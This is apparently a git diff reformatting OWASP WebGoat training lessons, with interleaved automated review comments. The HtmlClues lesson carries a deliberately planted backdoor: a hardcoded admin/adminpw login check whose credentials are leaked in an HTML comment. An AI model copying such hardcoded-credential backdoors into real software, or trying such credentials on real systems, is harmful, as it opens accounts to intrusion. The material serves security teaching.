will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class HtmlClues extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - - /** - * Description of the Field - */ - protected final static String PASSWORD = "Password"; - - /** - * Description of the Field - */ - protected final static String USERNAME = "Username"; - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - private boolean backdoor(WebSession s) - { - String username = s.getParser().getRawParameter(USERNAME, ""); - String password = s.getParser().getRawParameter(PASSWORD, ""); - - // - return (username.equals("admin") && password.equals("adminpw")); - // - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - // - ec.addElement(new Comment("FIXME admin:adminpw")); - // - ec.addElement(new Comment("Use Admin to regenerate database")); - - if (backdoor(s)) - { - makeSuccess(s); - - s.setMessage("BINGO -- admin authenticated"); - 
ec.addElement(makeUser(s, "jsnow", "CREDENTIALS")); - } - else - { - ec.addElement(makeLogin(s)); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - } - - return (ec); - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @param user Description of the Parameter - * @param method Description of the Parameter - * @return Description of the Return Value - * @exception Exception Description of the Exception - */ - protected Element makeUser(WebSession s, String user, String method) - throws Exception - { - ElementContainer ec = new ElementContainer(); - ec.addElement(new P().addElement("Welcome, " + user)); - ec.addElement(new P().addElement("You have been authenticated with " - + method)); - - return (ec); - } - - - protected Element makeLogin(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new H1().addElement("Sign In ")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr - .addElement(new TH() + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") .addElement( - "Please sign in to your account. 
See the OWASP admin if you do not have an account.") - .setColSpan(2).setAlign("left")); - t.addElement(tr); + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - tr = new TR(); - tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); - t.addElement(tr); + /** + * Description of the Field + */ + protected final static String PASSWORD = "Password"; - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); + /** + * Description of the Field + */ + protected final static String USERNAME = "Username"; - TR row1 = new TR(); - TR row2 = new TR(); - row1.addElement(new TD(new B(new StringElement("*User Name: ")))); - row2.addElement(new TD(new B(new StringElement("*Password: ")))); + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + private boolean backdoor(WebSession s) + { + String username = s.getParser().getRawParameter(USERNAME, ""); + String password = s.getParser().getRawParameter(PASSWORD, ""); - Input input1 = new Input(Input.TEXT, USERNAME, ""); - Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); - row1.addElement(new TD(input1)); - row2.addElement(new TD(input2)); - t.addElement(row1); - t.addElement(row2); + // + return (username.equals("admin") && password.equals("adminpw")); + // + } - Element b = ECSFactory.makeButton("Login"); - t.addElement(new TR(new TD(b))); - ec.addElement(t); + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); - return (ec); - } + try + { + // + ec.addElement(new Comment("FIXME admin:adminpw")); + // + ec.addElement(new Comment("Use Admin to regenerate database")); + if (backdoor(s)) + { + makeSuccess(s); - /** - * Gets the hints attribute of the CluesScreen 
object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("You can view the HTML source by selecting 'view source' in the browser menu."); - hints.add("There are lots of clues in the HTML"); - hints - .add("Search for the word HIDDEN, look at URLs, look for comments."); + s.setMessage("BINGO -- admin authenticated"); + ec.addElement(makeUser(s, "jsnow", "CREDENTIALS")); + } + else + { + ec.addElement(makeLogin(s)); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + } - return hints; - } + return (ec); + } + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @param user + * Description of the Parameter + * @param method + * Description of the Parameter + * @return Description of the Return Value + * @exception Exception + * Description of the Exception + */ + protected Element makeUser(WebSession s, String user, String method) throws Exception + { + ElementContainer ec = new ElementContainer(); + ec.addElement(new P().addElement("Welcome, " + user)); + ec.addElement(new P().addElement("You have been authenticated with " + method)); - /** - * Gets the instructions attribute of the HtmlClues object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "Below is an example of a forms based authentication form. 
Look for clues to help you log in."; + return (ec); + } - return (instructions); - } + protected Element makeLogin(WebSession s) + { + ElementContainer ec = new ElementContainer(); - private final static Integer DEFAULT_RANKING = new Integer(30); + ec.addElement(new H1().addElement("Sign In ")); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + if (s.isColor()) + { + t.setBorder(1); + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + TR tr = new TR(); + tr.addElement(new TH() + .addElement("Please sign in to your account. See the OWASP admin if you do not have an account.") + .setColSpan(2).setAlign("left")); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); + t.addElement(tr); - /** - * Gets the category attribute of the FailOpenAuthentication object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.CODE_QUALITY; - } + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + TR row1 = new TR(); + TR row2 = new TR(); + row1.addElement(new TD(new B(new StringElement("*User Name: ")))); + row2.addElement(new TD(new B(new StringElement("*Password: ")))); - /** - * Gets the title attribute of the CluesScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Discover Clues in the HTML"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + Input input1 = new Input(Input.TEXT, USERNAME, ""); + Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); + row1.addElement(new TD(input1)); + row2.addElement(new TD(input2)); + t.addElement(row1); + t.addElement(row2); + + Element b = ECSFactory.makeButton("Login"); + t.addElement(new TR(new TD(b))); + ec.addElement(t); + + return (ec); + } + + /** + * Gets the hints attribute of the CluesScreen object + * + * 
@return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("You can view the HTML source by selecting 'view source' in the browser menu."); + hints.add("There are lots of clues in the HTML"); + hints.add("Search for the word HIDDEN, look at URLs, look for comments."); + + return hints; + } + + /** + * Gets the instructions attribute of the HtmlClues object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "Below is an example of a forms based authentication form. Look for clues to help you log in."; + + return (instructions); + } + + private final static Integer DEFAULT_RANKING = new Integer(30); + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the category attribute of the FailOpenAuthentication object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.CODE_QUALITY; + } + + /** + * Gets the title attribute of the CluesScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Discover Clues in the HTML"); + } + + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java index 8836562c8..bc229823b 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpBasics.java @@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
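Review bot: The re-indented methods keep the generated placeholder Javadoc (`Description of the Method`, `Description of the Parameter`) on `backdoor`, `createContent` and `makeUser`, so the one fact a maintainer needs — that the `admin`/`adminpw` comparison is the lesson's planted clue, mirrored by the `FIXME admin:adminpw` HTML comment that `createContent` emits — is documented nowhere; replace the placeholder on `backdoor` with `/** Lesson hook: accepts only the credentials deliberately leaked in the page's HTML comment; not a real authentication path. */` and give `createContent` and `makeUser` a one-line summary each. `makeUser` still declares `throws Exception` although nothing in its body throws a checked exception, which is what forces the broad `catch (Exception e)` in `createContent`; dropping the clause lets that catch be narrowed. `getHints` keeps raw types (`List hints = new ArrayList();`) and `DEFAULT_RANKING` uses the boxing constructor `new Integer(30)` (deprecated on newer JDKs); `List<String> hints = new ArrayList<String>();` and `Integer.valueOf(30)` are the safer spellings.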
@@ -10,127 +10,119 @@ import org.apache.ecs.html.Input; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author Bruce Mayhew WebGoat * @created October 28, 2003 */ public class HttpBasics extends LessonAdapter { - private final static String PERSON = "person"; + private final static String PERSON = "person"; - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - StringBuffer person = null; - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - ec.addElement(new StringElement("Enter your name: ")); + ElementContainer ec = new ElementContainer(); - person = new StringBuffer(s.getParser().getStringParameter(PERSON, - "")); - person.reverse(); + StringBuffer person = null; + try + { + ec.addElement(new StringElement("Enter your name: ")); - Input input = new Input(Input.TEXT, PERSON, person.toString()); - ec.addElement(input); + person = new StringBuffer(s.getParser().getStringParameter(PERSON, "")); + person.reverse(); - Element b = ECSFactory.makeButton("Go!"); - ec.addElement(b); - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + Input input = new Input(Input.TEXT, PERSON, person.toString()); + ec.addElement(input); + + Element b = 
ECSFactory.makeButton("Go!"); + ec.addElement(b); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + if (!person.toString().equals("") && getLessonTracker(s).getNumVisits() > 3) + { + makeSuccess(s); + } + + return (ec); } - if (!person.toString().equals("") - && getLessonTracker(s).getNumVisits() > 3) + /** + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value + */ + public List getHints(WebSession s) { - makeSuccess(s); + List hints = new ArrayList(); + hints.add("Type in your name and press 'go'"); + hints.add("Turn on Show Parameters or other features"); + hints.add("Press the Show Lesson Plan button to view a lesson summary"); + hints.add("Press the Show Solution button to view a lesson solution"); + + return hints; } - return (ec); - } + /** + * Gets the ranking attribute of the HelloScreen object + * + * @return The ranking value + */ + private final static Integer DEFAULT_RANKING = new Integer(10); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Type in your name and press 'go'"); - hints.add("Turn on Show Parameters or other features"); - hints.add("Press the Show Lesson Plan button to view a lesson summary"); - hints.add("Press the Show Solution button to view a lesson solution"); + protected Category getDefaultCategory() + { + return Category.GENERAL; + } - return hints; - } - - /** - * Gets the ranking attribute of the HelloScreen object - * - * @return The ranking value - */ - private final static Integer DEFAULT_RANKING = new Integer(10); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - protected Category getDefaultCategory() - { - return Category.GENERAL; - } - - - /** - * Gets the title attribute of the 
HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Http Basics"); - } + /** + * Gets the title attribute of the HelloScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Http Basics"); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java index a28ea80db..da879370d 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java @@ -1,12 +1,11 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.security.MessageDigest; - import javax.servlet.http.HttpServletResponse; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
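Review bot: `person` is declared as `StringBuffer person = null;` and assigned only inside the `try`, yet `person.toString()` is dereferenced after the `catch` block, so any exception from `s.getParser().getStringParameter(PERSON, "")` becomes a NullPointerException right after the lesson has reported `Error generating ...`; initialise it with `StringBuffer person = new StringBuffer();` (or guard with `person != null`) so the success check sees an empty value instead. The emptiness test reads more directly as `person.length() > 0` than `!person.toString().equals("")`. The Javadoc on `createContent` is still the generated placeholder (`Description of the Method`); a summary such as `Renders the name prompt, echoes the submitted name reversed, and marks the lesson solved once a non-empty name has been sent on more than three visits.` describes what the method actually does, and the `Gets the ranking attribute` Javadoc sits on the `DEFAULT_RANKING` field rather than on `getDefaultRanking()`.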
@@ -18,351 +17,409 @@ import org.apache.ecs.html.TD; import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.WebSession; - import sun.misc.BASE64Encoder; -/******************************************************************************* + + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ -public class HttpOnly extends LessonAdapter { - - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - +public class HttpOnly extends LessonAdapter +{ + + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); + private final static Integer DEFAULT_RANKING = new Integer(125); - + private final static String UNIQUE2U = "unique2u"; - + private final static String HTTPONLY = "httponly"; - + private final static String ACTION = "action"; - + private final static String READ = "Read Cookie"; - + private final static String WRITE = "Write Cookie"; - + private final static String READ_RESULT = "read_result"; - + private boolean httpOnly = false; - + private boolean readSuccess = false; - + private boolean writeSuccess = false; - + private String original = "undefined"; - + /** - * Gets the title attribute of the EmailScreen object - * - * @return The title value + * Gets the title attribute of the EmailScreen object + * + * @return The title value */ public String getTitle() { - return ( "HTTPOnly Test" ); + return ("HTTPOnly Test"); } protected Integer getDefaultRanking() { return DEFAULT_RANKING; } - + /** - * Description of the Method - * - * @param 
s Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value */ - protected Element createContent( WebSession s ) + protected Element createContent(WebSession s) { ElementContainer ec = new ElementContainer(); String action = null; String http = null; - + http = s.getRequest().getParameter(HTTPONLY); action = s.getRequest().getParameter(ACTION); - - if(http != null) { + + if (http != null) + { httpOnly = Boolean.parseBoolean(http); } - - if(httpOnly) { -// System.out.println("HttpOnly: Setting HttpOnly for cookie"); + + if (httpOnly) + { + // System.out.println("HttpOnly: Setting HttpOnly for cookie"); setHttpOnly(s); - } else { -// System.out.println("HttpOnly: Removing HttpOnly for cookie"); + } + else + { + // System.out.println("HttpOnly: Removing HttpOnly for cookie"); removeHttpOnly(s); } - - if(action != null) { - if(action.equals(READ)) { + + if (action != null) + { + if (action.equals(READ)) + { handleReadAction(s); - } else if(action.equals(WRITE)) { + } + else if (action.equals(WRITE)) + { handleWriteAction(s); - } else { - //s.setMessage("Invalid Request. Please try again."); + } + else + { + // s.setMessage("Invalid Request. Please try again."); } } - + try { ec.addElement(makeContent(s)); - } - catch ( Exception e ) + } catch (Exception e) { - s.setMessage( "Error generating " + this.getClass().getName() ); + s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } - return ( ec ); + return (ec); } - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! + * DOCUMENT ME! + * + * @return DOCUMENT ME! 
*/ protected Category getDefaultCategory() { return Category.XSS; } - /** - * Gets the hints attribute of the EmailScreen object - * - * @return The hints value + * Gets the hints attribute of the EmailScreen object + * + * @return The hints value */ protected List getHints(WebSession s) { List hints = new ArrayList(); - hints.add( "Read the directions and try out the buttons." ); + hints.add("Read the directions and try out the buttons."); return hints; } - - private String createCustomCookieValue() { + + private String createCustomCookieValue() + { String value = null; byte[] buffer = null; MessageDigest md = null; BASE64Encoder encoder = new BASE64Encoder(); - - try { + + try + { md = MessageDigest.getInstance("SHA"); buffer = new Date().toString().getBytes(); - + md.update(buffer); value = encoder.encode(md.digest()); original = value; - - } catch (Exception e) { + + } catch (Exception e) + { e.printStackTrace(); } - + return value; } - - private void setHttpOnly(WebSession s) { + + private void setHttpOnly(WebSession s) + { String value = createCustomCookieValue(); HttpServletResponse response = s.getResponse(); String cookie = s.getCookie(UNIQUE2U); - - if(cookie == null || cookie.equals("HACKED")) { + + if (cookie == null || cookie.equals("HACKED")) + { response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + "; HttpOnly"); original = value; - } else { + } + else + { response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + "; HttpOnly"); original = cookie; } } - - private void removeHttpOnly(WebSession s) { + + private void removeHttpOnly(WebSession s) + { String value = createCustomCookieValue(); HttpServletResponse response = s.getResponse(); String cookie = s.getCookie(UNIQUE2U); - - if(cookie == null || cookie.equals("HACKED")) { + + if (cookie == null || cookie.equals("HACKED")) + { response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + ";"); original = value; - } else { + } + else + { response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + 
";"); original = cookie; } } - - private ElementContainer makeContent(WebSession s) { + + private ElementContainer makeContent(WebSession s) + { ElementContainer ec = new ElementContainer(); Element r = null; Table t = null; TR tr = null; Form f = null; - + ec.addElement(new StringElement(getJavaScript())); f = new Form(); - + t = new Table(); t.setWidth(500); - + tr = new TR(); - + tr.addElement(new TD(new StringElement("Your browser appears to be: " + getBrowserType(s)))); t.addElement(tr); - + tr = new TR(); t.addElement(tr); - + tr = new TR(); - - tr.addElement( new TD(new StringElement ("Do you wish to turn HTTPOnly on?"))); - - tr.addElement( new TD(new StringElement ("Yes"))); - - if(httpOnly == true) { - r = new Input(Input.RADIO, HTTPONLY, "True" ).addAttribute("Checked", "true"); - } else { - r = new Input(Input.RADIO, HTTPONLY, "True" ).addAttribute("onClick", "document.form.submit()"); + + tr.addElement(new TD(new StringElement("Do you wish to turn HTTPOnly on?"))); + + tr.addElement(new TD(new StringElement("Yes"))); + + if (httpOnly == true) + { + r = new Input(Input.RADIO, HTTPONLY, "True").addAttribute("Checked", "true"); } - + else + { + r = new Input(Input.RADIO, HTTPONLY, "True").addAttribute("onClick", "document.form.submit()"); + } + tr.addElement(new TD(r)); - - tr.addElement( new TD(new StringElement ("No"))); - - if(httpOnly == false) { + + tr.addElement(new TD(new StringElement("No"))); + + if (httpOnly == false) + { r = new Input(Input.RADIO, HTTPONLY, "False").addAttribute("Checked", "True"); - } else { + } + else + { r = new Input(Input.RADIO, HTTPONLY, "False").addAttribute("onClick", "document.form.submit()"); } - + tr.addElement(new TD(r)); - + r = new Input(Input.HIDDEN, READ_RESULT, ""); tr.addElement(r); - + t.addElement(tr); - -/* tr.addElement(new TD(new StringElement("Status: " ))); - t.addElement(tr); - - if(httpOnly == true) { - tr.addElement(new TD(new StringElement("
On
"))); - } else { - tr.addElement(new TD(new StringElement ("
Off
"))); - } - - t.addElement(tr); - t.addElement(new TR(new TD(new StringElement("
")))); -*/ f.addElement(t); - + + /* + * tr.addElement(new TD(new StringElement("Status: " ))); + * t.addElement(tr); if(httpOnly == true) { tr.addElement(new TD(new StringElement("
On
"))); } else { tr.addElement(new TD(new StringElement ("
Off
"))); } t.addElement(tr); t.addElement(new TR(new TD(new + * StringElement("
")))); + */f.addElement(t); + t = new Table(); tr = new TR(); - + r = new Input(Input.SUBMIT, ACTION, READ).addAttribute("onclick", "myAlert();"); tr.addElement(new TD(r)); - + r = new Input(Input.SUBMIT, ACTION, WRITE).addAttribute("onclick", "modifyAlert();"); tr.addElement(new TD(r)); t.addElement(tr); - + f.addElement(t); ec.addElement(f); - + return ec; } - - private void handleReadAction(WebSession s) { - + + private void handleReadAction(WebSession s) + { + String displayed = s.getRequest().getParameter(READ_RESULT); - - if(httpOnly == true) { - if(displayed.indexOf(UNIQUE2U) != -1) { - s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U + + if (httpOnly == true) + { + if (displayed.indexOf(UNIQUE2U) != -1) + { + s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U + "' cookie. It allowed direct client side read access to this cookie."); - } else { - s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U + } + else + { + s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U + "' cookie by preventing direct client side read access to this cookie."); - if (writeSuccess) { - if (!this.isCompleted(s)) { + if (writeSuccess) + { + if (!this.isCompleted(s)) + { makeSuccess(s); readSuccess = false; writeSuccess = false; } - } else { - if (!this.isCompleted(s)) { + } + else + { + if (!this.isCompleted(s)) + { s.setMessage("Now try to see if your browser protects write access to this cookie."); readSuccess = true; } } } - } else if(displayed.indexOf(UNIQUE2U) != -1) { - s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U + "' cookie was displayed in the alert dialog."); - } else { - s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U + } + else if (displayed.indexOf(UNIQUE2U) != -1) + { + s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U + + "' cookie was 
displayed in the alert dialog."); + } + else + { + s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U + "' cookie should have been displayed in the alert dialog, but was not for some reason. " + "(This shouldn't happen)"); } } - - private void handleWriteAction(WebSession s) { + + private void handleWriteAction(WebSession s) + { String hacked = s.getCookie(UNIQUE2U); - - if(httpOnly == true) { - if(!original.equals(hacked)) { - s.setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '" + UNIQUE2U + "' cookie."); - s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked + " on the client side."); - } else { - s.setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '" - + UNIQUE2U + "' cookie by preventing client side modification."); - if (readSuccess) { - if (!this.isCompleted(s)) { + + if (httpOnly == true) + { + if (!original.equals(hacked)) + { + s + .setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '" + + UNIQUE2U + "' cookie."); + s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked + + " on the client side."); + } + else + { + s + .setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '" + + UNIQUE2U + "' cookie by preventing client side modification."); + if (readSuccess) + { + if (!this.isCompleted(s)) + { makeSuccess(s); readSuccess = false; writeSuccess = false; } - } else { - if (!this.isCompleted(s)) { + } + else + { + if (!this.isCompleted(s)) + { s.setMessage("Now try to see if your browser protects read access to this cookie."); writeSuccess = true; } } } - } else if(!original.equals(hacked)) { - s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U + } + else if (!original.equals(hacked)) + { + s.setMessage("Since HTTPOnly was not enabled, the 
browser allowed the '" + UNIQUE2U + "' cookie to be modified on the client side."); - } else { - s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U + } + else + { + s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U + "' cookie to be modified on the client side, but it was not for some reason. " + "(This shouldn't happen)"); } } - - private String getJavaScript() { + + private String getJavaScript() + { StringBuffer buffer = new StringBuffer(); - + buffer.append("\n"); - + return buffer.toString(); } - - private String getBrowserType(WebSession s) { + + private String getBrowserType(WebSession s) + { int offset = -1; String result = "unknown"; String browser = s.getHeader("user-agent").toLowerCase(); - - if(browser != null) { - if(browser.indexOf("firefox") != -1) { + + if (browser != null) + { + if (browser.indexOf("firefox") != -1) + { browser = browser.substring(browser.indexOf("firefox")); - + offset = getOffset(browser); - + result = browser.substring(0, offset); - } else if(browser.indexOf("msie 6") != -1) { + } + else if (browser.indexOf("msie 6") != -1) + { result = "Internet Explorer 6"; - } else if(browser.indexOf("msie 7") != -1) { + } + else if (browser.indexOf("msie 7") != -1) + { result = "Internet Explorer 7"; - } else if(browser.indexOf("msie") != -1) { + } + else if (browser.indexOf("msie") != -1) + { result = "Internet Explorer"; - } else if(browser.indexOf("opera") != -1) { + } + else if (browser.indexOf("opera") != -1) + { result = "Opera"; - } else if(browser.indexOf("safari") != -1) { + } + else if (browser.indexOf("safari") != -1) + { result = "Safari"; - } else if(browser.indexOf("netscape") != -1) { + } + else if (browser.indexOf("netscape") != -1) + { browser = browser.substring(browser.indexOf("netscape")); - + offset = getOffset(browser); - + result = browser.substring(0, offset); - } else if(browser.indexOf("konqueror") != -1) { + } + else if 
(browser.indexOf("konqueror") != -1) + { result = "Konqueror"; - } else if(browser.indexOf("mozilla") != -1) { + } + else if (browser.indexOf("mozilla") != -1) + { result = "Mozilla"; } } - + return result; } - - private int getOffset(String s) { + + private int getOffset(String s) + { int result = s.length(); - - for(int i=0; i 126) { + + for (int i = 0; i < s.length(); i++) + { + if (s.charAt(i) < 33 || s.charAt(i) > 126) + { result = i; break; } } - + return result; } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java index 74f68d5aa..3317e465c 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HttpSplitting.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.io.PrintWriter; 
